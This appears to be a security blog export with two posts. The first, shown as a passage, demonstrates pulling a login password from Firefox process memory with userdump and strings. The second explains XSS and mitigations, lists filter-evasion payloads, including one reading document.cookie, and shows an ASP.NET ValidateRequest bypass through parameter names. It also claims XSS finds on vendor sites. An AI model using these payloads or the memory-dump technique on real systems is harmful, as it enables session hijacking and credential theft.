<span style="font-family: Verdana,sans-serif;">So coming back! After the authentication phase the password is stored in the process memory which can be easily extracted using tools like userdump or memory viewers like WinHex.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Here is a small POC on PTMP:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Shtep bi shtepp!!</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">1) I closed all instances of my awsum firefox and opened up my firefox's pentesting profile which i have created ( prbly i wud write about how to create one in one of my future blogs ).</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">2) Navigated to the website {https://www.google.com/xyz} and entered my login credentials</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">3) Now its time to dump the process for this i used userdump could be found at (http://www.microsoft.com/en-in/download/details.aspx?id=4060)</span><br />
<span style="font-family: Verdana,sans-serif;">and listed all the running processes [ userdump.exe -p ]</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6SWFaU8fcTdwpr0WpiX_p5Vq-2MAD5puZDwr4AjTCgMm7zBfbiUDBgvBYQ9R_-MwoAdtFGaZCL9tpdpSLwUUn-ikpxLqxhHSrCiPk9HasJK3UJvNZ3uQGITauUHkSTsEgxxgyGKLEsRI/s1600/userdump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6SWFaU8fcTdwpr0WpiX_p5Vq-2MAD5puZDwr4AjTCgMm7zBfbiUDBgvBYQ9R_-MwoAdtFGaZCL9tpdpSLwUUn-ikpxLqxhHSrCiPk9HasJK3UJvNZ3uQGITauUHkSTsEgxxgyGKLEsRI/s320/userdump.png" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">This will list out all the running process on my system but what i am more intrested is a dump of my firefox.exe</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg78UJ8xv_JeJEu_jc4IIj0R68JFY6siPyV5gsUj1akQduC77yB8YNrIqeS3m4r3s4gD5qlPzO5FM7DgxkUQ2NEuKfzPpPCFbC1VonfzpiQ6qXGm3jVK5gHTfJIIGxM3ibsel0CHjOaXs8/s1600/dump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg78UJ8xv_JeJEu_jc4IIj0R68JFY6siPyV5gsUj1akQduC77yB8YNrIqeS3m4r3s4gD5qlPzO5FM7DgxkUQ2NEuKfzPpPCFbC1VonfzpiQ6qXGm3jVK5gHTfJIIGxM3ibsel0CHjOaXs8/s320/dump.png" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">The command to dump is "userdump firefox.exe" ( it is also allowed to give the particular PID of the process which is 5724 in this case )</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">4) Now after having the dump i extracted the readable strings from it using a tool from the Sysinternal suite called strings.exe ( strings.exe firefox.dmp > test.txt )</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJrOvH4QAHXKnN7kHUFXDQGP_M9R1yf7cnHEFjfsIRPpEmf_xpPWZo51XCnjFUDkATMoAwhpAUin_xNpdDVEWgzXaGdq3NopI_2MP63IiH1tCJ4J7PPmXLu7Y9XK8MMNzfjYELTaL0Zuk/s1600/passwrd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJrOvH4QAHXKnN7kHUFXDQGP_M9R1yf7cnHEFjfsIRPpEmf_xpPWZo51XCnjFUDkATMoAwhpAUin_xNpdDVEWgzXaGdq3NopI_2MP63IiH1tCJ4J7PPmXLu7Y9XK8MMNzfjYELTaL0Zuk/s320/passwrd.PNG" width="320" /></a></span></div>
<br /></div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com1tag:blogger.com,1999:blog-1982130572676896150.post-77086888717382149352012-09-27T02:19:00.000-07:002014-10-21T23:14:38.958-07:00Don't XSS me!<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana,sans-serif;">Cross site scripting is a type of attack wherein a malicious script is injected and executed in a users browser and the payload can be as dangerous as hijacking a users valid session. XSS does not really rely on web browser or operating system vulnerability but it specifically targets the web application flaws in handling inputs. In this post i will highlight some of the mitigation's and some well known facts about XSS.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">When this vulnerability was first discussed it was considered as a lame horse in front of big giants like SQL injection until in October 04 2005 when the sammy worm took myspace in just few hours. More details on this xss worm can be found <a href="http://namb.la/popular/tech.html" target="_blank">here</a></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Its not always required to insert a <script> tag for xss to work, sometimes <script> tag may be stripped off by application filters making your payload useless. </span><br />
<span style="font-family: Verdana,sans-serif;">Few more ways:</span><br />
<span style="font-family: Verdana,sans-serif;">a)<IMG SRC=j&#X41vascript:alert('hello')></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">b)<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">c)';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">For more awesome vectors see this link <a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" target="_blank">Rsnake XSS</a> </span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">This portion of the article would benefit most of the developers who would think of security as a </span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">major aspect than a fancy UI. Some of the important things that a developer should keep in mind </span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">before starting any web application assignment is that whatever input is collected from the client </span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">side cannot be trusted. Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner.Have a look at XSS prevention cheat sheet <a href="https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet" target="_blank">here</a>. The OWASP Esapi Library is highly recommended for preventing Cross site scripting attacks.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><b>Some new attack vectors</b>:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Recently i came across this blog entry which describes a new way of looking into XSS attacks.</span><br />
<span style="font-family: Verdana,sans-serif;">Here the attack is more towards tweaking parameter names rather than the parameter values.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">The conventional way an attacker would try! </span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">http://abc/test.aspx?a=<script></span><br />
<span style="font-family: Verdana,sans-serif;">alert('xss')</script></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">But in ASP.Net application the ValidateRequest is enabled by default which would strip out the HTML </span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">mark ups and pop up an error as shown below.</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28Ce5gldiEqGyT_DC52xSuA1vZACqjRNvp3v-KXe0hTM0j2PzVdfsv-Jkz7dwFP1v87LAmGBKb9nBg-Acn-BMyFLMgJ_b3cqndGfKf72rB_1pUE_uRPr4R15cGoXDD6CDRvpK6IJm54c/s1600/Xss-Error.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28Ce5gldiEqGyT_DC52xSuA1vZACqjRNvp3v-KXe0hTM0j2PzVdfsv-Jkz7dwFP1v87LAmGBKb9nBg-Acn-BMyFLMgJ_b3cqndGfKf72rB_1pUE_uRPr4R15cGoXDD6CDRvpK6IJm54c/s320/Xss-Error.png" height="199" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">However, if we instead place our attack payload into a parameter name, then ValidateRequest allows </span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">our input through and we hit the vulnerable code:</span><br />
<span style="font-family: Verdana,sans-serif;">http://abc/test.aspx?<script></span><br />
<span style="font-family: Verdana,sans-serif;">alert('xss')</script>=a</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1-OxZDPYqAlKBXHRd4sSnXbSlGasuqzPuXLVYR7ALxbLY3L82zbOQz2Y2oYl0k7ITij8HQn03rrRNiDSx08kkHM5-VSWgjfqNZ3kpwWyofqb3j9QtYRYjk87MfO06qSZUUDe3keFxAbY/s1600/Xss.pnj.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1-OxZDPYqAlKBXHRd4sSnXbSlGasuqzPuXLVYR7ALxbLY3L82zbOQz2Y2oYl0k7ITij8HQn03rrRNiDSx08kkHM5-VSWgjfqNZ3kpwWyofqb3j9QtYRYjk87MfO06qSZUUDe3keFxAbY/s320/Xss.pnj.PNG" height="200" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Few websites Xssed by me:</span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"> <b>Adobe</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjtf4-ZcBbJAFiIL_3Y3-mPWyOWLoRNbocajOT-6gGR8QEen2fuM26W8PeoQpJAKbq_4kOx2B4VK0O0_TXXCtOwqSF3frdbBPotTAgIF8HlKBcx8aO31ZD3mF10gKaqjcacQO1igmUPg/s1600/Adobe.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjtf4-ZcBbJAFiIL_3Y3-mPWyOWLoRNbocajOT-6gGR8QEen2fuM26W8PeoQpJAKbq_4kOx2B4VK0O0_TXXCtOwqSF3frdbBPotTAgIF8HlKBcx8aO31ZD3mF10gKaqjcacQO1igmUPg/s320/Adobe.PNG" height="240" width="320" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<span style="font-family: Verdana,sans-serif;"> </span><br />
<span style="font-family: Verdana,sans-serif;"> <b>Symantec</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwdln9muPceV9ciAFZXUMeYCTvLlCDStuRHfCYzqIakW6g2JuyRbGSCpyMLC5leKI7WgjgBhkjNT99LwEYYwkHYemZ03SgH-agn1V-NA0DvfVDTed0lRgkYtfAasXNoj4NRtDVnSpk7iI/s1600/symantec.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwdln9muPceV9ciAFZXUMeYCTvLlCDStuRHfCYzqIakW6g2JuyRbGSCpyMLC5leKI7WgjgBhkjNT99LwEYYwkHYemZ03SgH-agn1V-NA0DvfVDTed0lRgkYtfAasXNoj4NRtDVnSpk7iI/s320/symantec.PNG" height="240" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;"> <b>Mcafee</b></span><br />
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcmeogs0whozfFKv5HzAx-3rpx9kCGKO8MTQWlS0xNh855mmqS23Nzv1F9_AhYuZh4wSbru2F4FXzBBM6rJ46U0gS7ffjFLO8nSC3IwpgaaOe__Lvejt4R1kIl-PZ7O4KwHTtuqAiZcfQ/s1600/Mcafee.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcmeogs0whozfFKv5HzAx-3rpx9kCGKO8MTQWlS0xNh855mmqS23Nzv1F9_AhYuZh4wSbru2F4FXzBBM6rJ46U0gS7ffjFLO8nSC3IwpgaaOe__Lvejt4R1kIl-PZ7O4KwHTtuqAiZcfQ/s320/Mcafee.PNG" height="240" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<span style="font-family: Verdana,sans-serif;">Post credits: Owasp, Rsnake, Portswigger</span><br />
<span style="font-family: Verdana,sans-serif;">Title credit: <a href="http://www.imdb.com/title/tt2077833/" target="_blank">Rowdie Rathore</a> (2012)</span></div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0